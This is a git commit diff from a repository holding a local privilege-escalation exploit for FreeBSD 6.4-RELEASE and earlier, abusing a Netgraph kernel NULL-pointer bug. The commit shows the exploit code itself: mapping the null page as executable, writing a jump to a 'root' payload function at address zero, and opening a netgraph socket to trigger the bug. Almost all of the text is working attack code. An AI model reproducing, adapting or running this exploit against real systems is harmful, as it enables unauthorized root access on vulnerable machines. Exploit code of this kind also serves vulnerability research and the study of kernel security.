authorJason A. Donenfeld <Jason@zx2c4.com>2011-02-27 01:48:51 -0500
committerJason A. Donenfeld <Jason@zx2c4.com>2011-02-27 01:48:51 -0500
commit83ff9d1ee5964795911c113fb8962de91e58398e (patch)
treea244abe889e308cada22806d8fe674536820f1dd
parentNon functional jail escape functionality. (diff)
Don't copy. Just jmp to function.
-rw-r--r--current-thread-exec.c31
1 files changed, 6 insertions, 25 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c
index cd6bd1d..01f9acc 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -90,42 +90,23 @@ int root(void)
int main(int argc, char *argv[])
{
- unsigned char *c;
- unsigned char *d;
- void *v;
- int s;
-
fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");
fprintf(stderr, "[+] mmapping null page\n");
- v = mmap(
- NULL,
- PAGES * PAGE_SIZE,
- PROT_READ | PROT_WRITE | PROT_EXEC,
- MAP_ANON | MAP_FIXED,
- -1,
- 0);
- if (v == MAP_FAILED) {
+ if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
perror("[-] mmap failed");
return -1;
}
- fprintf(stderr, "[+] copying pwnage into null page\n");
- c = v;
- d = (unsigned char*)root;
- while (1) {
- *c = *d;
- if (*d == 0xc3)
- break;
- d++;
- c++;
- }
- *c++ = 0xc3;
+ fprintf(stderr, "[+] adding jmp to pwnage in null page\n");
+ *(char*)0x0 = 0x90;
+ *(char*)0x1 = 0xe9;
+ *(unsigned long*)0x2 = (unsigned long)&root;
fprintf(stderr, "[+] opening netgraph socket\n");
- s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
+ int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if (s < 0) {
perror("[-] failed to open netgraph socket");
return -1;